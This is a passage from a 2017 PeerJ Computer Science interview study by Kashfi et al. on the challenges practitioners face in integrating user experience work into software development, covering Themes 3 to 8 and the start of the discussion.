market that are known for their good UX (e.g., Apple). Another organization (F) uses fixed prices for their projects so that practitioners can freely spend part of the budget on UX practices. Some practitioners emphasized that they talk about UX ‘indirectly’. They connect UX to business goals, and argue for UX from the point of view of the business success, and not the end users. An interviewee motivated this by saying: ‘‘if you start babbling about usability and strange kind of things, they will say ‘oh! I don’t want to pay for this’.’’ (E-1/HCI). According to some practitioners, UX practices should be sold to the customer as part of the contract to assure coverage of the associated costs. This requires showing how such practices will add value to the software and have a return on investment (ROI) for the customer. Nevertheless, often presenting a ROI is difficult. This is illustrated by a UX prac- titioner who said: ‘‘I don’t think you can put ROI into a proposal necessarily. I think that’s irresponsible, frankly. Because 95% of the time, we don’t understand the true and false nature of an issue when we’re writing a proposal. It’s only after working with a client for a little bit of time that we begin to see the nuance there. That usually undercuts any kind of under- standing that’s used to generate proposed improvements in ROI, for example.’’ (G-1/HCI). Theme 3. Low industrial impact of UX models, tools and methods We identified a number of challenges concerning how practitioners apply UX theories, tools and methods (see Fig. 5). We observed that often practitioners’ knowledge regarding UX is based on experience and work with similar concepts, not on any specific UX models or theories. Some practitioners had formal training in usability and IxD and used that foundation to build UX skills over time in an ad hoc way. For instance, one of the practitioners stated: ‘‘When I first started in the 90s, there was no such thing as UX or IxD, actually ... [then] it has been IxD and then sort of merged into UX design.’’ (H-1/HCI). In general, the interviewees were not familiar with currently popular approaches to UX and corresponding models, even those interviewees that demonstrated a relatively good understanding of UX. One interviewee (A-4/HCI) stated that she handles users’ emotions, values etc. ‘in a non-academic way’, another interviewee (A-2/HCI) said that the way she handles UX is not formal or ‘by the book’. The practitioners generally showed a positive attitude towards applying new models, tools, methods and techniques to their work: ‘‘we are lacking this, so this would be really nice to have more research results that we could apply.’’ (A-2/HCI). However, often organizations resist introducing new models, tools, methods, or techniques. Hence, in the studied organizations, practitioners often only rely on traditional interview and observation techniques in their work with UX. The interviewees referred to two models they use in their UX work: ‘emotional design’ by Donald Norman and Maslow’s hierarchy of human needs. The latter is used as an Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 15/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Theme 3: Low industrial impact of UX models, tools & methods Organisations resist to introduce UX tools & methods Current UX theories are often unknown to practitioners Knowledge on UX is gained individually & in an ad hoc way & not through theories includes UX practitioners apply only traditional tools & methods Figure 5 Challenges concerning industrial impact of UX theories (Theme 3). Full-size DOI: 10.7717/peerjcs.130/fig-5 Theme 4: Focus on objectively measurable aspects of software Stakeholders focus on functionality & often down-prfioritize quality characteristics Stakeholders focus on actual quality characteristics & often down-prioritize the perceived qualities Stakeholders focus on objectively measurable quality characteristics includes Too much focus on functionalities can lead to ignoring UX The relation of functionality and UX is often not taken into account Figure 6 Challenges concerning subjective aspects of software (Theme 4). Full-size DOI: 10.7717/peerjcs.130/fig-6 inspiration when eliciting user needs. The interviewees mentioned that such models can help create a methodology to work with UX and ‘‘build the right things in the right order’’ (F-1/HCI). Respondents with this type of experience were a clear minority. Theme 4. Focus on objectively measurable aspects of software Another identified theme of challenges concerns how the studied organizations handle subjective aspects of software (see Fig. 6). A group of practitioners emphasized that the software development and engineering community has traditionally had much greater focus on software functionality. One practitioner stressed the relation between functionality and UX as follows: ‘‘The quality of experience is really depending to some extent on how the functional requirements are met, but also actually on what the functional requirements are, also just the amount of them.’’ (H-1/HCI). This interviewee further emphasized: ‘‘For us, technology is the material that we can shape in order to create experiences.’’ The interviewees emphasized that satisfying functional requirements does not necessarily mean that the software includes correct or valuable functionality. This is evidenced by one interviewee saying: ‘‘what do you know when you have signed [the technical specification]? Do you know that it is a good solution? No! you only know that it meets the functional requirements and to me it is silly!’’ (E-1/HCI). In addition, the participants believed that the software community often focuses more on ‘actual’ than ‘perceived’ quality characteristics of software. While the former concerns Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 16/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-5 https://doi.org/10.7717/peerjcs.130/fig-6 http://dx.doi.org/10.7717/peerj-cs.130 Theme 5: Difficulties in engineering UX- related requirements To-be goals/non-task related needs are either ignored or treated informally Traceability between UX- related & business requirements is often lost in projects Customers are too ambitious regarding UX-related requirements Customers use wrong terminology for UX-related requirements Practitioners lack guidelines on mapping non-task-related needs to measurable requirements It is difficult to involve users to assure addressing UX-related requirements includes Non-task-related needs are hard to elicit, refine, communicate & agree upon Practitioners lack tools & methods to deal with non-task- related needs Practitioners need forms other than text to communicate UX- related requirements It is difficult to find a balance between business & technical & UX-related requirements There is a lack of consensus on to what extent users should be involved in projects User involvement is perceived to be time- consuming Functional requirements are easier to define & translate to design solutions than UX- related requirements There is a lack of consensus on the order of eliciting & refining functional vs. UX- related requirements Figure 7 Challenges concerning requirements work (Theme 5). Full-size DOI: 10.7717/peerjcs.130/fig-7 objectively measurable quality characteristics, the latter concerns how users subjectively perceive these qualities. For instance, users may perceive a response time of 50 ms (i.e., actual performance) as fast or slow (i.e., perceived performance). Regarding the role of perceived qualities in experience of users an interviewee stated: ‘‘sometimes the perception of time is more important than the actual time, and these are the things you should pinpoint [to the stakeholders].’’ (E-1/HCI). Theme 5. Difficulties in engineering UX-related requirements Another identified theme of challenges concerns handling UX in requirements work (see Fig. 7). According to the practitioners, in many cases, the non-task-related needs of users (i.e., their be-goals) or their emotions are either neglected or treated only informally: ‘‘We’d specify this more in the persona descriptions; for example that this persona needs to, or wants to experience some kind of things. In the wireframes, we might specify an animation for example that it should feel smooth or something like that.’’ (A-2/HCI). For instance, in one of the organizations, emotional design goals are often only documented and communicated in the form of a ‘‘post-it note on the wall’’, as a reminder. Although the interviewee emphasized this approach is not optimal and there is a need for more formal approaches to deal with such requirements: ‘‘it should be good if we could formalize it a little bit more I think.’’ (A-2/HCI). The practitioners highlighted that it is an open problem as to how to map these types of needs to measurable requirements. For instance, one of the interviewees stated: ‘‘I would say the emotional part of this is very very rarely formally put into words.’’ (A-1/HCI). In Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 17/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-7 http://dx.doi.org/10.7717/peerj-cs.130 particular, when the software product is innovative, these problems are compounded. This is evidenced by an interviewee saying: ‘‘This is a kind of project where nobody really can tell how this should be, what it should be like, nobody has done it before, there are no standards to refer to ...who can specify those [UX-related] requirements? You need to have a certain quality but what is the suitable level of that quality? We haven’t really found what that level is.’’ (B-3/SE). The practitioners generally agreed that to communicate UX-related requirements, they require forms other than text (e.g., sketches, wireframes). They emphasized ‘‘concrete and tangible’’ forms can facilitate communicating these intangible and abstract requirements, and ensure that be-goals as well as do-goals are taken into consideration. Regarding this an interviewee told us: ‘‘we create ‘mood boards’ where you take an image-driven approach to the look and feel, and we use references of course, like ‘that app has a good flow in it’, and ‘that app has a good feeling to it’.’’ (A-1/HCI). Practitioners with technical backgrounds also seemed to have a similar approach to UX-related requirements: ‘‘If the customer said that they want it to ‘look nice’, then you have to make the graphical design first and then they can say ‘hey! this looks nice’ and then you have taken care of that requirement.’’ (A-3/SE). It is important that these non-textual UX-related requirements (e.g., wireframes) are traceable to other requirements. Regarding this a practitioner stated: ‘‘at the end we show the wireframes with all kinds of numbers and those numbers are linked to the excel sheets of the requirements, their descriptions and how they are linked with the CPR and business case.’’ (F-1/HCI). Practitioners related these problems to a lack of competence in dealing with UX-related requirements within their organizations: ‘‘I think it is largely a competence thing. Doing emotional aspects of design is quite a new concept, I have only heard about it in the last year, or last two years maybe, so I do not think that knowledge has really reached the industry yet.’’ (A-3/SE). UX practitioners believed that handling functionality is comparatively easy and straightforward. Regarding this, one practitioner highlighted: ‘‘features are what most project managers, most managers can understand. You can count them, you can map them to customers, customer dialog for instance, and so forth, and you can compare your amount of features with the competitors...when it comes to both features and user experience requirements—features are a bit easier to define somehow, because you can say things like, ‘Right, we need an email component with this capability’’’ (H-1/HCI). As another example, an interviewee stated: ‘‘Functional requirements are easy to create, to merge into a design; more emotional things are more difficult.’’ (F-1/HCI). UX practitioners argued that UX-related requirements should be elicited before refining functional requirements. For instance, one interviewee stated: ‘‘First you have to define the business requirements, the user requirements, the IxD, then you can define the functional requirements.’’ (E-1/HCI). Another practitioner said: ‘‘I think that the functional requirements should come as a result of a dialog between different types of domains such as user experience, business, and technology.’’ (H-1/HCI). Nevertheless, according to these practitioners, such an approach is not common in practice. This is inline with the view of practitioners with technical backgrounds who believe the requirement process should start by first eliciting and refining functional requirements and then quality requirements. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 18/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Some practitioners highlighted the challenge of finding a balance between UX-related needs, business goals, and technological constraints. Regarding the importance of finding a balance between emotional and business needs, one of the interviewees stated: ‘‘you can spend a lot of time, thinking about people’s emotions and so on, but if you are going to succeed you have to look at the business perspective.’’ (E-1/HCI). In addition, according to the interviewees, while customers should be involved to assure alignment of projects with business perspectives, the end users should be involved to assure alignment with UX-related needs, and practitioners require to find a balance between these needs. As an example, an interviewee stated: ‘‘we can buy the best camera in the world, users will have a better image quality than they have in reality but it is too expensive today, ....that ruins the business case for that customer’’ (e.g., B-3/SE). We observed some inconsistencies in practitioners’ views concerning user involvement. In favor of involving users an interviewee stated: ‘‘maybe you want to have the end user involved also with the developers so that developers understand what they are doing, instead of just following the specifications. I think that would be very very valuable.’’ (A-3/SE). On the other hand, a project manager stated that involving users in requirements discussions increases the costs of the projects. Therefore, it is better to negotiate requirements and sign a contract without involving the users. Regarding this an interviewee stated: ‘‘[they] think they can say anything during the [requirement] workshop and then get it. It is not the case... So it leads to lots of long long long discussions afterwards.’’ (B-2/SE). As another example: ‘‘it usually leads to features that you take on more than what you agreed from the beginning. So it’s possible that the customer gets a better system but they still don’t pay you more money for this.’’ (B-1/SE). One developer stated that they often have less access to the end users, which can be problematic for their work mainly because this means developers do not often understand the rationale for the requirements: ‘‘developers don’t get the motivation behind the requirements because that gets lost during the way. So, the marketing people say that we must have this requirement, and interaction designers say we must do it this way, so you have the ‘what’ and the ‘how’ but you never get the ‘why’.’’ (A-3/SE). Some practitioners emphasized that relying too much on the end users’ opinions might lead to less creativity in the design work: ‘‘we have a quote sitting on the wall here, it’s from Henry Ford [that says] ‘If I had asked people what they wanted, they would have said a faster horse’.’’ (H-2/HCI). Theme 6. Focus on evaluating functionality and usability, not UX We also identified a number of challenges regarding evaluation of UX in the studied organizations (see Fig. 8). Our data shows that in general, our selected organizations mainly focus on testing functionality. In addition, similar to the previous theme on requirements, the interviewees highlighted that limited involvement of the end users in projects is a challenge to evaluating UX, especially since evaluating UX requires gathering users subjective perception of the software. We observed that practitioners with technical backgrounds are often unfamiliar with how their organizations handle UX or even usability testing. They also showed limited knowledge as to why such evaluations can contribute to the success of the software. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 19/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Theme 6: Focus on evaluating functionality & usability, not UX UX evaluation is more difficult because of its holistic nature & broad scope Practitioners focus more on testing functionality Situatedness of UX makes it difficult to evaluate Practitioners find it more difficult to evaluate UX than usability or other quality characteristics Temporality of UX makes it difficult to evaluate Limited resources are assigned to UX evaluation although it requires more resources Practitioners find it difficult to evaluate non- task-related/hedonic aspect of software Practitioners have limited access to tools & methods for evaluating UX includes It is difficult to involve users to evaluate UX, in particular its subjective elements Technical stakeholders lack knowledge on the value of UX evaluation Technical stakeholders lack knowledge on how UX evaluation is performed UX evaluation is often replaced by usability testing UX evaluation is performed informally so may not result in reliable results Practitioners require more complete prototypes to evaluate UX Figure 8 Challenges concerning testing and evaluation (Theme 6). Full-size DOI: 10.7717/peerjcs.130/fig-8 Generally speaking, UX evaluation is immature in the studied organizations. In projects with limited time or budget, UX evaluation is either non-existent or rare, especially when compared to other testing activities: ‘‘we have done much functional testing of course, system tests etc., but end user testing we have not performed much I’d say.’’ (A-2/HCI). In some organizations, UX evaluation is basically replaced by usability testing. Regarding this, one interviewee stated: ‘‘I think user tests tend to be more focused on pure usability. I guess it’s when you’re releasing the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones.’’ (A-4/HCI). According to these practitioners, usability testing is not enough to evaluate the whole UX of the software. Regarding this, a UX practitioner stated: ‘‘when you evaluate usability, it’s when you go into the nitty gritty details, and try to look at efficiency within the user interface. My personal view is that that is not that relevant. I mean it’s relevant but not in what we do [i.e., UX].’’ (H-2/HCI). To compensate for limited formal UX evaluations, some practitioners gather informal qualitative user feedback after release, for instance through comments in the App Store or on social media. According to the practitioners we spoke with, UX evaluation is limited because it is difficult compared to evaluating usability or other quality characteristics. Some practitioners Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 20/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-8 http://dx.doi.org/10.7717/peerj-cs.130 related this difficulty to the fact that UX involves emotions, and non-task-related user needs (i.e., be-goals), and that limited tools and methods exist to support addressing these needs in evaluations. Emotion can be even impossible to measure using current quantitative approaches, as one of the practitioners stated: ‘‘it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end. If we had a method or approach to really get these from the user that would be great.’’ (A-2/HCI). Similarly, one interviewee said: ‘‘some goals are more difficult to measure than others, e.g., if this is a feeling thing: ‘I should be very well informed’, but mostly you can measure [them] in the usage test through observations and interviews’’ (E- 1/HCI). This practitioner further emphasized that they can specify quantitative measures for UX-related requirements (e.g., ‘‘10 out of 10 users should succeed, and they should be content’’), but also need to observe users in order to gain better understanding of the experience: ‘‘can the users perform the tasks? how do they perform the tasks? how do they feel afterwards? are they content?’’ (E-1/HCI). This interviewee further emphasized that to measure feelings of users they need ‘a rather complete prototype’. Practitioners highlighted that despite importance of involving the end users in UX evaluations, it is difficult to access them: ‘‘I think we should involve the end users a lot more but it is a political issue, the project needs to convince the customer that this is necessary.’’ (A-2/HCI). Some of the interviewees related the difficulty in UX evaluation to the holistic nature of UX. Discussing cases where practitioners take a holistic approach to UX, one interviewee stated: ‘‘how would you measure that sort of holistic experience throughout the process of designing it? Because, of course you cannot [implement or design] everything at the same time, and you know there are so many dependencies. How do you straighten those out and how do you understand what you’re measuring and not measuring?’’ (H- 1/HCI). This interviewee further emphasized that the broader scope of UX negatively impacts evaluations: ‘‘Evaluation is a problem of course, cause user experience is much broader in scope than usability, it’s more difficult to evaluate also. Like the phone example that I gave you before, how do you pick up on the fact that someone has experienced the competition unless you ask for it? Can you count on what a person would actually say about their experience? What if the person doesn’t say anything? That’s a problem, of course, because UX is much broader in scope, and if you have a wider scope on it, then you have a much more difficult task to actually frame it in an evaluation phase.’’ (H-1/HCI). Some practitioners related the difficulty in UX evaluation to the fact that users’ expectations and their perception of a product change over time and are affected by various factors; e.g., introduction of new technologies or appearance of a competing product. One of the interviewees highlighted: ‘‘It’s like when you try on new clothes. The shirt you were wearing going into the dressing room and looked fine, looks shabby when you’ve tried out the new shirt.’’ (H-1/HCI). The interviewee used this analogy to explain the subjective and dynamic nature of expectations, and that for each individual a new experience can affect the user’s perception of other products. Another problem concerns difficulties in relating the result of laboratory evaluations to the real experience of users, and the role of context in forming experiences: ‘‘I think user tests tend to be more focused on pure usability. I guess it’s when you’re releasing Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 21/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Theme 7: Lack of consensus on UX related competencies & responsibilities There is a lack of practitioners with multidisciplinary competencies needed to handle UX There is a lack of consensus on how the diverse UX responsibilities should be assigned in projects Organisations lack competencies for eliciting, refining & communicating be-goals or non-task- related needs UX practitioners often fail to gain & control an overall view on UX design, specially in agile settings A diverse set of competencies is required for better UX work includes UX responsibilities are not well-defined in organziations UX responsibilities are negatively impacted by limited resources & low management support Figure 9 Challenges concerning UX-related competencies and responsibilities (Theme 7). Full-size DOI: 10.7717/peerjcs.130/fig-9 the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones. So it’s often good to make some sort of what we call a beta product and publish it. Let people interact with it. But that’s a luxury also because that takes time. Often, in many, many cases, you have to just make something work. In an ideal world you should have a testing phase, of course. To get the users’ perspective. That should be really nice to have.’’ (A-4/HCI). Another problem concerns the relation between different episodes of experience, for instance first impression of users and UX after using the software for a while: ‘‘It’s a fantastic feeling to sit in a brand-new car in a car shop. How do you feel about the same car if you’ve had it for a year, driving it around with two kids in the backseat, for instance? Experiencing all of the quirks from the interior, and all the things that don’t work, the stupid things that make your hands go dirty every time you’re supposed to close a door, for instance? That’s part of user experience design. So it’s a very floating scale.’’ (H-1/HCI). Theme 7. Lack of consensus on UX-related competencies and responsibilities Another group of challenges concerns the competencies and responsibilities required to perform UX practices (see Fig. 9). Our data shows that for better UX work, organizations need to have access to a variety of competencies including brand management, visual design, usability engineering, interaction design, and emotional design. In particular, to be able to address the hedonic aspect of UX, it is crucial to have access to competencies for eliciting, refining, communicating, and testing be-goals or non-task-related needs of users. A group of interviewees believed that due to the wide spectrum of UX competencies, it is unlikely to find all of those competencies in any individual practitioner. This group therefore argued that all of the team members (with complementary competencies) should jointly take on the UX responsibilities. Regarding this, one of the practitioners said: ‘‘I’m not sure if that should be a specific role [...] so everybody should have a UX focus now. I’m not sure if we can have some sort of UX guy [who takes the final decisions].’’ (A-4/HCI). This interviewee further emphasized that achieving a better UX requires a ‘UX-mindset’ that Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 22/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-9 http://dx.doi.org/10.7717/peerj-cs.130 even the technical roles in the projects (e.g., programmers) should have. On the other hand, a group of interviewees believed there is a need for specific practitioners with these multidisciplinary competencies because these competencies are tightly connected and hard to separate. This group therefore argued for defining specific UX-related roles and responsibilities in projects. Regarding the importance of access to individuals with diverse competencies, an interviewee stated: ‘‘I, as an art director, have to have somewhat deep knowledge about UX, and also IxD ...you can’t separate them.’’ (A-4/HCI). Another interviewee said: ‘‘You have to be knowledgeable in many areas. You have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent, at least, to gain their respect, but also you have to be treated as an equal...You also have to understand business, and that side of software. You have to be a little bit of everything but you also have to be a specialist in your own domain so it’s kind of like a juggling act.’’ (H-1/HCI). Being able to gain an overall view of UX design was one of the concerns highlighted in the interviews. According to the practitioners, this is often a difficult yet important prerequisite for creating a coherent UX. As the interviewees stated, to deal with the complexity of today’s systems, the common approach in the software community is to break down the whole system into various sub-systems and work on them independently. Such an approach can harm the UX of the software since often in these cases UX practitioners lose the overall view on the UX design, how these different sub-systems fit together as a whole, and how they individually and in combination contribute to the experience of the end users. Regarding this, one interviewee emphasized: ‘‘you have to tear it down, yeah! but what happens to the whole? who is going to define the whole?’’ (E-1/HCI). The interviewees also highlighted that in agile settings, the decision-making process is spread out both over time as well as among the team members. This further complicates the process of creating a unified and coherent UX design (e.g., H-1/HCI). Further, agile processes enforce a focus on a few piece(s) of the design at each iteration. Regarding this, one interviewee said: ‘‘you need to deliver wireframes for parts of the application but you still do not know how it all will fit together at the end.’’ (A-2/HCI). Similar to what we saw for competencies, our data shows that responsibilities of UX practitioners are also very diverse. As some UX practitioners expressed, they have varying responsibilities in and contributions to different projects; this depends on factors such as management support, available resources, and timing. In one organization (C), the UX team is responsible for handling requirements and feeding them to the development teams. In another organization (G), the UX group is part of R&D where the group mainly focuses on future products, and long-term vision of the company. One UX practitioner from company G described her responsibilities as: ‘‘that can loosely be described as discovery, research, overall strategy, and then high-level design.’’ (G-1/HCI). In another organization (H), since the number of practitioners with UX knowledge is low, none of these practitioners are part of any particular project teams, and are instead shared resources among projects. UX practitioners are also often responsible for spreading knowledge and awareness about UX in the organization, or giving support to development teams concerning UX matters. Regarding this, a practitioner expressed: ‘‘I think on a very high level, our responsibility is to Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 23/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Theme 8: Communication & collaboration gap between UX & non-UX practitioners UX perspective may get lost in later development phases UX work is more visible throughout the process than usability work UX-related decisions are postponed in projects, specially in agile settings Some stakeholders believe UX can be improved through minor changes to the GUI in later development phases Power struggles rise between UX & non- UX practitioners Non-UX practitioners lack trust in UX practitioners since the UX field is relatively young UX practitioners get involved in projects late There may be a communication & collaboration gap between UX and non-UX practitioners includes Figure 10 Challenges concerning communication and collaboration between UX and non-UX practitioners (Theme ). Full-size DOI: 10.7717/peerjcs.130/fig-10 inform, influence and inspire.’’ (H-1/HCI). He further stated: ‘‘we contribute to the process by running workshops, by providing provocative questions, or providing examples, engaging in discussions in which people from other domains dig down really deep into their own layers of knowledge, and we can ask really simple questions to poke them with our perspective.’’ (H-1/HCI). Theme 8. Communication and collaboration gap between UX and non-UX practitioners This theme of challenges concerns how UX and non-UX practitioners communicate with each other and collaborate in projects (see Fig. 10). The interviewees generally agreed that better UX work requires early involvement of UX practitioners in projects. Early involvement helps UX practitioners get first-hand information about the customer and the end users. In addition, practitioners get a chance to negotiate trade-offs between the design solutions and technical constraints. If required, a design concept can then be updated based on the developers’ feedback. Nevertheless, UX practitioners often are involved in projects only in later stages. Regarding this a practitioner stated: ‘‘The worst case is when someone has met a client and talked a lot about the software, then I meet this guy who has met the client ... then it’s secondhand information and everything gets distorted.’’ (A-4/HCI). Early involvement is in particular important since in later stages it is difficult or even impossible to make effective changes to the UX design. As an interviewee stated: ‘‘on the personal level developers can be offended if someone thinks it’s not a good solution, they can have a hard time killing their darlings, they could have been thinking of it as a very beautiful Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 24/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-10 http://dx.doi.org/10.7717/peerj-cs.130 solution they have made with 40,00 lines of code, so they don’t want to throw it away.’’ (H- 2/HCI). Some stakeholders however believe that UX can be improved with just minor GUI changes in later stages of development, they therefore down-prioritize UX practices in earlier stages. The interviewees also highlighted that agile processes have a limited focus on strategic decisions such as the overall UX of the software. Often these strategic decisions are either ‘skipped’ or postponed since agile methodologies tend to prioritize immediate and current problem solving: ‘‘agile is a lot about problem solving and that’s what sort of gets priority.’’ (H-1/HCI). According to the interviewees, even in cases when UX practitioners are involved in early phases, they may lose their connection to the project in later phases. To overcome this problem, the practitioners proposed various solutions. One interviewee, for instance, stated that they rely on UX advocates in projects: ‘‘We are not UX experts that you hire if you want to give a problem to somebody, have them go away for three months, and then have them come back with the solution... If something needs to go into production after our principal work is finished, you need somebody who’s going to be involved in that process and involved from the very beginning. So we have a very strong focus on collaboration...Oftentimes, at least when it comes to transitioning into a production environment, we’re looking for UX savvy development managers or developers.’’ (G-1/HCI). Another UX practitioner told us that throughout their projects, they continuously check the status of the UX design: ‘‘we try to have always at least one person who was part of the original dialog present during the weekly checkups, and basically just going by the desks and checking, informally.’’ (A-1/HCI). UX practitioners need to be involved in projects early on, and need to have an active role throughout the projects which, in our interviewees’ view, can lead to power struggles between UX and non-UX practitioners: ‘‘sometime it can be perceived as we’re trying to take control of the situation.’’ (H-1/HCI). This interviewee further emphasized this often means that working with UX is more difficult than usability: ‘‘I think the reason why it was easier to work with usability to some extent was that you didn’t take up any space. It was like being a woman in the early 20th century. You were there, but you didn’t vote, you didn’t do anything.’’ (H-1/HCI). Similarly another interviewee said: ‘‘There are a lot of strong stakeholders that are really interested in doing those kind of things, programmers for instance, who like to be in control.’’ (A-2/HCI). Power struggles between UX and non-UX practitioners were also attributed to different motivations of practitioners (e.g., a developer wanting to develop more efficient code vs. a designer wanting to create a better design). Regarding this, a UX practitioners emphasized: ‘‘Everyone wants to start with their own domain, as soon as possible, from day one. Then, of course, you have the problem of ownership of the direction, where to go and what to do and why. That’s something that we struggle with quite a bit.’’ (E-1/HCI). Similarly, another interviewee said: ‘‘I think there is an ongoing struggle, cause we all have different drivers; like my driver is always about making technology that is interesting, useful, and brings some sort of value to the users in the context in which it is being used.’’ (H-1/HCI). This interviewee further emphasized the situation has changed in their work as they moved from usability towards UX in recent years: ‘‘Compared to when we only worked with usability, I would argue that the situation is rather different, and part of it has to do with, being part of the Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 25/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 early phases, but I think the biggest challenge and the biggest struggle nowadays is really the ownership of decision making, and who calls the shots ...Because usability didn’t disturb the big process, the big decision-making, the prioritization of what to do, or what constituted a feature that was needed to be implemented. Usability wasn’t part of that discussion. Usability was always part of like, how you should make a font, or the colors, like lipstick on the pig!’’ (H-1/HCI). Better UX work requires regular communication and collaboration among UX and non-UX practitioners which sometimes can be challenging since these two groups of practitioners often have different responsibilities, education, motivation, and constraints in their work. Regarding the importance of communicating with designers a developer stated: ‘‘I think we need to be working tighter with the design department to help them know what can be done.’’ (D-1/SE). Similarly, a UX practitioner said: ‘‘we really try to make this give and take ...we have constant communication, and I will say that we get always input from developers that we need to consider.’’ (A-2/HCI). According to the UX practitioners, if they are disconnected from the technical roles, e.g., developers, they may not be aware of technological constraints when choosing and developing a design concept: ‘‘honestly the further we are away from the people that actually build the stuff, we run the real risk of becoming hand waving idiots.’’ (G-1/HCI). Another UX practitioner stated: ‘‘I realized quite early in my career that I have to communicate with these guys who program or develop something, and I have to understand what they’re saying.’’ (A-4/HCI). The interviewees however emphasized that overcoming this communication gap should be a two-way effort: ‘‘I’m not saying that we should be the only ones with this kind of multidisciplinary approach. I think the other ones should also have that, that’s a big challenge, I would say.’’ (H-1/HCI). Similarly, another practitioner said: ‘‘So I have to have some sort of knowledge about the technology because I have to know what my limitations are .... I have to have some sort of technical know-how so I can communicate with developers. I expect the same from them. So they realize that the aesthetic choice has to be made and it can take time.’’ (A-4/HCI). According to the practitioners, in order to facilitate a better communication, UX practitioners need to acquire basic knowledge about various technical topics., e.g., programming, testing, architecture etc. As emphasized by one respondent: ‘‘You have to be like knowledgeable in many areas...you have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent...You also have to understand the business.’’ (H-1/HCI). Similarly, another practitioner stated: ‘‘you have to speak in an engineering language. That’s a real challenge for UX work, because you always have to translate it to terms that makes sense to an engineer or economist.’’ (A-1/HCI). The respondents also emphasized that communication between UX and non-UX practitioners can be challenging because of lack of trust in UX practitioners. Regarding this, one interviewee emphasized: ‘‘we have had problems with some of the developers sometimes. It has been a bit of conflict. I think we have some work to do to really get a ‘we-feeling’ that we, together, are developing an awesome product.’’ (C-1/HCI). One practitioner attributed this lack of trust to the fact that the field of UX is a relatively new field and less established Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 26/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 compared to the technical fields, e.g., SE. This also means that UX practitioners are often younger and less experienced than non-UX practitioners: ‘‘most UX practitioners are quite young still, I do not think they have been that long in the market for development of their competencies yet.’’ (A-3/SE). One UX practitioner emphasized that they can gain more trust over time and as they accomplish more in their work: ‘‘[over time] we are adding on the pile of what we would call successful things we have done, and of course that gives us a bit more ‘trust’ I could say.’’ (H-2/HCI). DISCUSSION In this section, we answer the research questions and describe the implications of our findings for research and practice. We use Hassenzahl’s model of UX and his proposed list of UX characteristics as an analytical lens to investigate the challenges in greater detail. In answer to RQ1 (what challenges do practitioners face when integrating UX practices into software development processes and organizations?), we found 8 themes of challenges as depicted in Fig. 2. Some of these themes are more fundamental and concern the views, attitudes and knowledge of stakeholders (Theme 1, Theme 2, Theme 3, and Theme 4) while some others are more tactical (Theme 5, Theme 6, Theme 7, and Theme 8). There is clearly a multifaceted and complex set of relations between the themes. These interrelations are discussed here to the extent supported by our data. More empirical data should be gathered in the future to elaborate and validate these connections. At a high level, the more fundamental themes can explain the tactical themes. A limited knowledge of UX (Theme 1) is likely also connected with the low impact of UX models in industry (Theme 3). In addition, a lack of common reference and knowledge base can lead to language gap, meaning that the concepts of UX and UX practices can mean different things to different people. This gap may contribute to communication problems within software development organizations (Theme 8). Through a lopsided emphasis on functionality and actual quality characteristics (Theme 4), we can explain the identified challenges concerning UX-related requirements (Theme 5) and testing (Theme 6). Requirements and testing challenges can also be attributed to limited tools, methods and competencies, and communication issues (Theme 3, Theme 7, and Theme 8). Even if companies intend to focus more on UX, they do not always have the capability (e.g., competencies) to turn this intention into action. Moreover, even if UX practitioners with the right competencies are present in an organization, they often face power struggles and lack of trust therefore fail to effectively communicate and collaborate with non-UX practitioners. In answer to RQ2 (how do UX challenges relate to challenges of handling software quality characteristics, in particular usability? ), we found that there are in fact various overlaps between the identified themes and challenges reported for handling usability and/or software quality characteristics in general. However, despite similarities at a superficial level, we differentiate the challenges through the characteristics of UX: subjective, holistic, context-dependent, temporal and worthwhile. In particular, through these characteristics, we highlight the inherent differences between UX and other quality characteristics, including Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 27/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 usability, and explain the lopsided focus of the software industry on usability and the pragmatic aspect of UX. While previous empirical studies report that usability is not understood properly, especially among technical stakeholders (e.g., Bak et al., 2008) we observed that in the studied organizations practitioners have fair knowledge and awareness about usability. This can be an indication that industrial knowledge and awareness of usability is improving. In the case of UX, the same level of maturity however is not yet achieved in industry and organizations struggle with knowledge and awareness concerning (i) the concept of UX and how it differs from usability, (ii) the potential of UX, in particular its hedonic aspect to add value to software, (iii) existing UX theories, tools and methods, and how to apply them in current development processes, (iv) competencies required for UX work, (v) handling UX-related responsibilities, and (vi) handling communication and collaboration among UX and non-UX practitioners. Previous research shows that usability and purpose of use often dominate over UX in the software industry (Väänänen-Vainio-Mattila, Roto & Hassenzahl, 2008; Kuusinen & Väänänen-Vainio-Mattila, 